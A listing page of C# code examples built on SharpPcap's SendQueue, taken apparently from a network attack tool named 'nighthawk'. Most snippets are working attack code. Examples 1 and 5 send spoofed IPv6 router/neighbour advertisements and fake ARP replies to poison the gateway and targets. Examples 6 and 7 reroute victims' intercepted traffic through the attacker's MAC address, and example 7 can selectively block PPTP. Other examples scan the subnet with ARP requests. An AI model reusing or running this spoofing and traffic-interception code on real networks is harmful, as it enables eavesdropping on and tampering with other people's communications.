示例#1
0
        // worker function for sending RA packets
        public void WorkerSender()
        {
            while (SpoofingStarted)
            {
                // we need to generate packets inside the loop, because IPv6toMACTargets can change (86 bytes for ND, 166 for RA ?)
                var sendQueue = new SendQueue(IPv6toMACTargets.Count * 86 + 166 + 512);

                sendQueue.Add(GenerateRouterAdvertisement(prefix).Bytes);

                foreach (var target in IPv6toMACTargets)
                {
                    // send spoofed ND advertisements to the gateway
                    if (target.Key != gatewayIPv6)
                    {
                        sendQueue.Add(GenerateNDAdvertisement(target.Key).Bytes);
                    }
                }

                sendQueue.Transmit(device, SendQueueTransmitModes.Normal);

                sendQueue.Dispose();

                Thread.Sleep(2500);
            }

            return;
        }
示例#2
0
        /// <summary>
        /// A variation to original "Transmit" method accepting "null" queues.
        /// </summary>
        public static void TransmitAll(this SendQueue sendQueue, WinPcapDevice device)
        {
            if (sendQueue == null)
            {
                return;
            }

            sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
            sendQueue.Dispose();
        }
示例#3
0
        // worker function for sending ARP requests
        private void WorkerSender()
        {
            // get start/end IP
            if (deviceInfo.Mask == "0.0.0.0")
            {
                deviceInfo.Mask = "255.255.255.0";
                ShowInputDialog(ref deviceInfo.Mask);
            }
            long[] range = Network.MaskToStartEnd(deviceInfo.IP, deviceInfo.Mask);

            long startIP   = range[0];
            long tot_endIP = range[1];
            long currentIP = startIP;
            int  chunkSize = 16;

            while (currentIP <= tot_endIP)
            {
                var possibilities = Math.Min((int)tot_endIP - (int)currentIP, chunkSize);
                var endIP         = currentIP + possibilities;
                var sendQueue     = new SendQueue(possibilities * 80);

                // There are still losses in arp, try to send packet in chunks

                var deviceIP = IPAddress.Parse(deviceInfo.IP);

                // create ARP requests for all the hosts in our subnet);
                while (currentIP <= endIP)
                {
                    sendQueue.Add(GenerateARPRequest(Network.LongToIP(currentIP), deviceIP).Bytes);

                    currentIP++;
                }

                // send our queue
                //sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
                // There are losses in ARP part, not sure why, try different timing for better accuracy
                sendQueue.Transmit(device, SendQueueTransmitModes.Synchronized);

                Thread.Sleep(1000);
            }
            Thread.Sleep(3000);
            // stop other threads and stop scanning
            Started = false;

            workerARP.Join();
            workerNDP.Join();

            ScanCompleted();

            return;
        }
示例#4
0
        // worker function for sending ARP requests
        private void WorkerSender()
        {
            for (int i = 0; i < 3; i++)
            {
                // get start/end IP
                long[] range = Network.MaskToStartEnd(deviceInfo.IP, deviceInfo.Mask);

                long startIP   = range[0];
                long endIP     = range[1];
                long currentIP = startIP;

                var possibilities = (int)endIP - (int)startIP;

                var sendQueue = new SendQueue(possibilities * 80);
                var deviceIP  = IPAddress.Parse(deviceInfo.IP);

                // create ARP requests for all the hosts in our subnet);
                while (currentIP <= endIP)
                {
                    sendQueue.Add(GenerateARPRequest(Network.LongToIP(currentIP), deviceIP).Bytes);

                    currentIP++;
                }

                // send our queue
                sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
                Thread.Sleep(3000);
            }


            // stop other threads and stop scanning
            Started = false;

            workerARP.Join();
            workerNDP.Join();

            ScanCompleted();

            return;
        }
示例#5
0
        // worker for sending ARP reply packets
        public void WorkerSender()
        {
            var sendQueue = new SendQueue((SpoofingTargets1.Count * 2 * 60) + 60);

            foreach (Target target1 in SpoofingTargets1)
            {
                // send fake replies to the gateway
                sendQueue.Add(GenerateARPReply(target1.IP, SpoofingTarget2.IP, SpoofingTarget2.PMAC).Bytes);

                // senda fake replies to targets
                sendQueue.Add(GenerateARPReply(SpoofingTarget2.IP, target1.IP, target1.PMAC).Bytes);
            }

            while (SpoofingStarted)
            {
                sendQueue.Transmit(device, SendQueueTransmitModes.Normal);

                Thread.Sleep(2500);
            }

            sendQueue.Dispose();

            return;
        }
示例#6
0
        // worker function for routing IPv6 packets
        public void WorkerRouter()
        {
            while (SpoofingStarted)
            {
                // size of packets - needed for send queue (set some starting value - it seems the length is not set correctly during threadQueue packet copying)
                int bufferSize = 2048;

                // copy packets to threadRoutingQueue
                lock (PacketQueueRouting)
                {
                    foreach (Packet packet in PacketQueueRouting)
                    {
                        threadQueueRouting.Add(packet);
                        bufferSize += packet.Bytes.Length;
                    }

                    PacketQueueRouting.Clear();
                }

                if (threadQueueRouting.Count > 0)
                {
                    var sendQueue = new SendQueue(bufferSize);

                    // loop through packets and change MAC addresses
                    foreach (Packet packet in threadQueueRouting)
                    {
                        if (packet == null)
                        {
                            continue;
                        }

                        var ethernetPacket = (packet as EthernetPacket);
                        if (ethernetPacket == null)
                        {
                            continue;
                        }

                        var ip = (packet is IpPacket ? (IpPacket)packet : IpPacket.GetEncapsulated(packet));

                        var sourceIP      = ip.SourceAddress.ToString();
                        var destinationIP = ip.DestinationAddress.ToString();

                        var destinationMAC = ethernetPacket.DestinationHwAddress.ToString();

                        if (sourceIP == deviceInfo.IPv6 || destinationIP == deviceInfo.IPv6)
                        {
                            continue;
                        }

                        // skip local network traffic
                        if ((sourceIP.Contains(prefix.Replace("::", ":")) && destinationIP.Contains(prefix.Replace("::", ":"))) || (sourceIP.Contains("fe80::") || destinationIP.Contains("fe80::")))
                        {
                            continue;
                        }

                        // check for IPv6 - MAC entry existance (check only addresses from this network) and add it if necessary (we need this because scanner cannot pick up IPv6 addresses of all the targets)
                        if (sourceIP.Contains(prefix.Replace("::", ":")) && !IPv6toMACTargets.ContainsKey(sourceIP) && !sourceIP.Contains("fe80::"))
                        {
                            lock (IPv6toMACTargets)
                            {
                                IPv6toMACTargets.Add(sourceIP, ethernetPacket.SourceHwAddress);
                            }
                        }

                        // incoming packets (internet -> nighthawk) - change destination MAC back to target's MAC
                        if (IPv6toMACTargets.ContainsKey(destinationIP) && (destinationMAC != IPv6toMACTargets[destinationIP].ToString()))
                        {
                            ethernetPacket.SourceHwAddress      = physicalAddress;
                            ethernetPacket.DestinationHwAddress = IPv6toMACTargets[destinationIP];

                            if (ethernetPacket.Bytes != null)
                            {
                                sendQueue.Add(packet.Bytes);
                            }
                        }

                        // outgoing packets (targets -> nighthawk) - change destination MAC to gateway's MAC
                        if (IPv6toMACTargets.ContainsKey(sourceIP) && (destinationMAC != IPv6toMACTargets[gatewayIPv6].ToString()))
                        {
                            ethernetPacket.SourceHwAddress      = physicalAddress;
                            ethernetPacket.DestinationHwAddress = IPv6toMACTargets[gatewayIPv6];

                            if (ethernetPacket.Bytes != null)
                            {
                                sendQueue.Add(packet.Bytes);
                            }
                        }
                    }

                    sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
                    sendQueue.Dispose();

                    threadQueueRouting.Clear();
                }
                else
                {
                    Thread.Sleep(1);
                }
            }

            return;
        }
示例#7
0
        // worker for routing IPv4 packets
        public void WorkerRouter()
        {
            while (SpoofingStarted)
            {
                // size of packets - needed for send queue (set some starting value - it seems the length is not set correctly during threadQueue packet copying)
                int bufferSize = 2048;

                // copy packets to thread's packet storage (threadRoutingQueue)
                lock (PacketQueueRouting)
                {
                    foreach (Packet packet in PacketQueueRouting)
                    {
                        threadQueueRouting.Add(packet);
                        bufferSize += packet.Bytes.Length;
                    }

                    PacketQueueRouting.Clear();
                }

                if (threadQueueRouting.Count > 0)
                {
                    var sendQueue = new SendQueue(bufferSize);

                    // loop through packets and change MAC addresses
                    foreach (Packet packet in threadQueueRouting)
                    {
                        if (packet == null)
                        {
                            continue;
                        }

                        var ethernetPacket = (packet as EthernetPacket);
                        if (ethernetPacket == null)
                        {
                            continue;
                        }

                        var ip = (packet is IpPacket ? (IpPacket)packet : IpPacket.GetEncapsulated(packet));

                        // discard invalid packets
                        if (ip is IPv4Packet && (((IPv4Packet)ip).Checksum == 0 || !((IPv4Packet)ip).ValidIPChecksum))
                        {
                            continue;
                        }

                        var sourceIP      = ip.SourceAddress.ToString();
                        var destinationIP = ip.DestinationAddress.ToString();

                        var sourceMAC      = ethernetPacket.SourceHwAddress.ToString();
                        var destinationMAC = ethernetPacket.DestinationHwAddress.ToString();

                        if (destinationMAC == sourceMAC)
                        {
                            continue;
                        }

                        // block PPTP if necessary (exclude local computer)
                        if (blockPPTP && sourceIP != deviceInfo.IP && destinationIP != deviceInfo.IP)
                        {
                            // block GRE
                            if (ip.Protocol == IPProtocolType.GRE)
                            {
                                continue;
                            }

                            // check for port 1723 and block it
                            if (ip.Protocol == IPProtocolType.TCP)
                            {
                                var tcp = TcpPacket.GetEncapsulated(packet);

                                if (tcp != null && (tcp.SourcePort == 1723 || tcp.DestinationPort == 1723))
                                {
                                    continue;
                                }
                            }
                        }

                        // incoming packets - change destination MAC back to target's MAC
                        if (IPtoMACTargets1.ContainsKey(destinationIP) && (destinationMAC != IPtoMACTargets1[destinationIP].ToString()))
                        {
                            ethernetPacket.SourceHwAddress      = physicalAddress;
                            ethernetPacket.DestinationHwAddress = IPtoMACTargets1[destinationIP];

                            if (ethernetPacket.Bytes != null)
                            {
                                sendQueue.Add(packet.Bytes);
                            }
                        }

                        // outgoing packets - change destination MAC to gateway's MAC
                        if (IPtoMACTargets1.ContainsKey(sourceIP) && (destinationMAC != SpoofingTarget2.PMAC.ToString()))
                        {
                            ethernetPacket.SourceHwAddress      = physicalAddress;
                            ethernetPacket.DestinationHwAddress = SpoofingTarget2.PMAC;

                            if (ethernetPacket.Bytes != null)
                            {
                                sendQueue.Add(packet.Bytes);
                            }
                        }
                    }

                    sendQueue.Transmit(device, SendQueueTransmitModes.Normal);
                    sendQueue.Dispose();

                    threadQueueRouting.Clear();
                }
                else
                {
                    Thread.Sleep(1);
                }
            }

            return;
        }